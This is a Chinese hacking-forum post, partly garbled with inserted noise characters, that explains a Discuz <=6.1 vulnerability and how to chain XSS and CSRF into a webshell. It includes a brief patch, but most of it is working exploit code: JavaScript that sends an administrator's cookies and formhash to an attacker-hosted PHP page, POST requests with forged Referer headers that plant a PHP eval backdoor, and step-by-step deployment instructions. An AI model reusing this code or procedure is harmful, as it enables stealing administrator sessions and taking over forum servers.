Discuz XSS得webshell
. `. A$ b% A, qBy racle @tian6.com# Z. b( j* U/ N( r
欢迎转帖.但请保留版权信息.
: ^5 L% `! w$ K4 l% E受影响版本 iscuz<=6.1.0,gbk+utf+big5
# x' A+ d u4 }# F
3 p/ T6 j; a3 W* a! x新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.6 w: _ p m. H" u" G- R% e
7 A" A a2 f" e: e9 @% I! {+ M s0 b. u$ x- y4 E
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
% _" ^( T8 r4 o当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
! |6 t4 C2 k# } D( s; A# z; z. C$ X
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
+ x6 A# q7 F' _! u2 P0 {本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS t; f+ w. r T& \2 j: p9 y
3 K# J8 l: k3 j! G0 ]
( L& s3 K# J( E1 B5 J0 b& f8 m% E
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------4 L ^% u A# g3 H' |
, e! m- A5 F+ G- p: ^' _
% w) V! l3 ~, [6 B! E- A$ Uproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.0 n4 }9 E8 d7 V$ I. k
( e( n" }( M! S& xproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.2 Q7 g- q* H3 w( ]) s$ O+ P
6 l4 i, Q9 C! W4 e, r8 M0 Pproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
2 \/ p8 v1 B2 ~" g4 P1 l4 |1 N3 W1 e6 U W" |# I
1 O; @9 A- E" ~6 t8 b, r7 I下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
4 M7 M3 b0 ]9 b+ S H: Q7 s; @+ C0 s# A# ^# T6 D
global $runwizardfile, $runwizardhistory;
/ ~* }: B) W) z) e6 `7 b# ^) P
. t, S6 r, l; p4 F' k $fp = fopen($runwizardfile, 'w');
9 w ]$ C" v8 A3 h6 a2 G) ]5 n' ?! y( q; p( ^
fwrite($fp, serialize($runwizardhistory));4 {5 \' Z& E7 Q8 H
^% h4 ^3 ~7 ^$ O& a fclose($fp);; \& ] l8 ]& O( m: O, `
5 _+ i" @/ s# C- m3 G}8 E/ J: v' F0 i' }
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.% a. l! m y' [9 S$ P7 `
以下是修补的办法:function saverunwizardhistory() {$ T# `- h0 q7 @0 o; s
. H+ R9 K. A2 v- ~( q global $runwizardfile, $runwizardhistory;
+ q: v3 ]0 X8 M+ v- {1 D. r, S/ F& i2 y3 G
$fp = fopen($runwizardfile, 'w');! n! g6 j0 ^6 y8 Z x2 c
% I7 {, t! L6 m C6 `
$s = '<?php exit;?>';6 s4 Z4 [- ?' T
. ]. e0 \$ G# E2 j, j1 c4 [/ k
$s .= serialize($runwizardhistory);% D8 K+ {# d7 _# h$ o* \
* t4 S$ j) l9 S
fwrite($fp, $s);, | v R( {0 s3 Q, M& w
# O( X% [: h0 R0 [5 d fclose($fp);& _: e K" t. G1 D
1 b' }& V1 a x: ^: i}
4 l1 i' Z# b# |3 r复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
! l" n0 |' T! a) x7 u n8 \# Q0 U, p, Q) i7 s. m
7 F+ F' m5 N* p/ O. X" _1 A1 K9 ?0 d0 i. N, ~$ M- i; a& B- W1 k
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
' v I; B9 I' a3 n' T `. d% @5 G- \/ k* Q+ {( ?% z0 l, j
# `. u3 V) S! r! l. K! {+ t
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
^$ D9 \3 ?' K3 V/ h7 \( S+ p* P" o5 n# S6 T. r
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
( U0 Q- h7 L- m& @% N$ _ H+ `& j3 N& R5 X
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
' i! l3 Z) D4 T# x& d4 [" K+ j$ L0 m0 K5 Q
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
$ c5 a! C! w, {+ i) `
" P& ?) u% |. @1 avar url="http://目标网站/admincp.php";
5 j+ n1 y( h% n! u! d* R7 V; [+ K! e/ o4 r. U" Z
/*获得cookies*/" G" t' I" U! [+ ]
8 u H) A% w8 Y+ Zfunction getURL(s) {
# K1 q0 C7 O, O
' A% T& C, O7 t3 Nvar image = new Image();! d' S6 W3 u2 o/ |% L
; w/ u8 J1 W* h# ^. n' w4 J5 H1 R& @
image.style.width = 0;* R9 {) I: x+ G$ q
: J$ N; b9 \# r( X5 [image.style.height = 0;
3 s0 u6 ~. B3 K$ r
8 W! L9 g% c% N# ]/ Pimage.src = s;
* H( I2 I3 ^) L- t6 J! E0 p6 d+ M R1 f" w# \9 s% Z) |
}
# R+ e0 S; y' C- l: j2 K/ j( f+ b) K
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php) F7 ` Z) h; h0 w2 V# B* n9 j7 m
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];: v1 |# }" w$ }" T' b, y
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
7 b5 W- D- C" B! `
! O8 |' K' K3 M, y5 j0 l( z8 |5 i/ r) _3 Q% k0 G
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";+ L. Y4 L1 C' p7 Z4 ?1 }! B( M* [
4 u. W4 d8 f. r7 }' O9 [+ a
- A) d6 j0 U- `3 m0 S# R G/ u7 S* n0 s8 ~; @( \* T
/*hash*/
U* h- j5 B% H8 v4 X6 _$ s) C% Z- d! `
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");% p0 t' j( B( B4 n0 [
- V" X p. a& p& }2 E) C
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);/ S1 w6 O: _* u- o, G
9 i& q- a( w7 \1 j0 S- y
xmlHttpReq.send();- K0 t. G- x: q0 X
8 U7 T% X# ?4 |* E. e' `var resource = xmlHttpReq.responseText;$ d; M: h! u$ }0 ]+ N
, s- G' q3 v5 {var numero = resource.search(/formhash/);
1 z$ W: T0 M1 Z7 N& A9 X4 s: f, j! w, l# T/ `; ^
var formhash=encodeURIComponent(resource.substr(numero+17,8));
: @$ Y% h+ r& {8 {2 q( h. Q2 T: y9 \' l1 @6 e2 I2 k l! W% ~0 w) C$ A
& M6 Y9 S7 Z0 v* w! @- V: S" }! j* x4 Z
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 " d/ k0 `- i4 o! ^
8 ^6 L( ~7 w* c0 VxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
. \9 g H4 b# }% F$ |% w! B; ~) ~" L* j! j0 h0 E& j2 `) ^
xmlHttpReq.setRequestHeader("Referer", url);
4 b! o/ x" S, {6 E; H$ h; R
6 E( ^1 R7 G6 a2 g% ?xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
2 N, Z" x/ V; t6 o. g6 \. b* s+ J8 W
xmlHttpReq.setrequestheader("content-length",post.length); 6 @- E% k, n g# N2 c$ R ~
6 T+ k5 H& e8 J1 F* l1 gxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
: [- F# i! @! |" r& M4 d4 U1 u4 N' g! u# `9 x
xmlHttpReq.send(post);//发送数据
6 F# }8 \/ ~5 y6 r$ y; D复制代码这里HASH我假设正确,这样提交,也无须cookies/ }6 M! s9 T( V0 U- q/ @
" v5 O: X% L; v* B/ E( X
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);2 o* Y4 J( v1 K: o j3 ` f
( Q& O' v0 K9 nif (!$sock) die("$errstr ($errno)\n");; J/ j( t C8 w! R A9 M6 y0 p% M' w) O
/ w9 b* p% A u: X+ W. L+ |$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';4 g( {4 u4 g- H. s2 |2 g
1 {8 x0 J" P8 J
6 S' y1 c+ V+ \ F( R! t
' m3 H9 h( b6 {5 s3 q( v& Y& ^# }4 U nfwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
* ?, V* Y& ?9 O4 }! Y& z+ F; ^2 g- ]% ]+ M" h, h
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
6 j4 a! H3 L# e( Y7 x$ H
" T7 ~% L0 b4 |fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
7 s# e0 E# ^) P2 P4 X7 M/ U5 Y2 u6 S: {, T& U
fwrite($sock, "Accept-Language: zh-cn\r\n");4 Q) }2 t9 i/ V8 Y2 @" X! Q& E( R
) w7 l' s3 D* M( \, kfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");7 U0 b* z; V1 N: Y
1 @6 u9 X" r1 _0 V; _! q" {fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");8 F" u' l4 T) Y0 w, ~0 |; T" o" b
' r6 W* U5 a+ m' \' l7 q: X k
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
/ a+ y6 F+ V; ?, y8 B6 I+ B! J9 {1 d" d! m% P1 n# G+ @* i
fwrite($sock, "Host: $url\r\n");
- P3 x9 E; m1 t L% c m: }- l9 y' O" @
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
$ }1 s1 C. Z6 I* U8 C
/ l; g- t) f3 r) u' c5 ifwrite($sock, "Connection: Keep-Alive\r\n");4 q, I/ @! X$ {# n6 _ l
) i2 C/ i! ?, ^; |fwrite($sock, "Cache-Control: no-cache\r\n");4 b! x: E4 K' f5 v
R3 i8 Z% }! p$ i6 w% N* C
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
, M9 n, \# x4 X& q9 |& Q3 K. f [) F1 Z6 i9 ?" b
fwrite($sock, $data);
3 ]" s$ S) n4 P2 q: z$ a7 L$ ?
; ]& X3 L8 h! q/ E) D8 G
7 A4 o( ?) q) A3 X& x: v& C( o( B( q$ i7 h
$headers = "";6 X7 c- F. X! {/ O7 z [- {, i
! u+ B( N7 p& |* y7 w- j
while ($str = trim(fgets($sock, 4096)))% \5 I1 r3 ]& t, D* N
( T) B0 i" n# |# r9 J; V $headers .= "$str\n";4 d6 U+ m+ L/ f! r* L8 {5 L! L
" O: t F. V, q1 i$ Jecho "\n";4 w& J. f0 |7 T9 E6 Z4 [1 K N
2 e4 B* n! d* J& f
$body = "";0 d5 [% {0 N$ C% |7 |
/ W+ ?0 g- s) `" l5 g0 M/ e+ E
while (!feof($sock))2 G6 I0 ~2 I/ A" V3 {
+ R! G: R$ F0 d0 A* L, F $body .= fgets($sock, 4096);
' {( m1 K/ W' i x( Q/ ~
6 Y; E2 T3 Q j. Ofclose($sock);+ u& d# J# J( v& i6 Y. D- \) ~0 S
/ H8 g# l1 B! H* y) Becho $body;
1 c2 n$ M) X& T) ~复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
% _* u9 q) O$ [' q8 c" ~/ w9 w6 l) p4 ^6 E! W3 O% R
* Y) C @" E( g6 O& \2 {, Y! a-------------------------------------------XSS文件分析分隔线----------------------------------------------------------------------------- F: T& X" M: G, [' i* K7 Y
, ~3 |2 s5 y" V" D! L1 U7 v9 @9 v. A( L# m) P1 k: L
1 HP SOCKET利用方法首先打开racle.js
5 R! ~0 C" e5 D2 ~1 X( Z0 d0 }3 _$ S8 n0 f9 }
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home( B0 \( J7 S q7 T7 w- g
* Q: q% k1 }5 j
& k& c" r4 Y1 i6 r8 ]* {, z. W# f
3 B( ^- z# z9 p2 @- v
然后打开racle@tian6.php
+ I7 |0 i% s; e/ x4 C" o5 E% n
7 H/ b! Z' h$ M! \3 l! U$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
6 o g) o2 ?; l; E& o
f' J, g) J. Z
/ l& N( ^/ R; [
2 ?; L I9 H! f& M如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
1 o; F) L" P2 V6 Y+ S
1 `6 h: v+ h, z4 q- ^getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));+ C! b4 \" n/ M# |3 u2 N4 N( v1 r6 w
# j. u, o) m4 q: b. T为( Y. X' n% |$ ^0 ?/ U H/ ?) j
% x: @# Q; Q0 W& w" CgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));# U* }5 L2 \/ m# {: Y3 h
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
# X0 g4 I/ T0 z! Z3 ]0 J) J1 K, J: h8 W" ^& `
/ {/ w9 Y7 i, d) R( Z4 Y% Z6 J& t) q# G6 s4 B W
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
A" H5 R9 A7 k- F- `! I; W% T4 [; r' f+ {6 U
var formhash=encodeURIComponent(resource.substr(numero+17,8));
' D- O( V( E0 H, c# V& v! j
+ u6 o$ _, P& Y' g' n为
2 \+ |0 p' F: z+ y" {* A2 p- I7 @/ _1 [
var formhash=encodeURIComponent(resource.substr(numero+9,8));
) I! Q1 r* t4 l X复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
8 t8 T# V1 r/ d) t$ h+ r9 E
& m1 c8 x c8 n& x/ B如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
+ A& D4 b. S- ^( _! p. t: M
! p" d% x- Y9 q2 [6 @如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.* |( w- _! a I9 [, l# [
; Q h o9 ~8 S不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.0 w7 g- `3 Q) _7 \2 n( g
' S P" x8 p0 t$ k/ K
|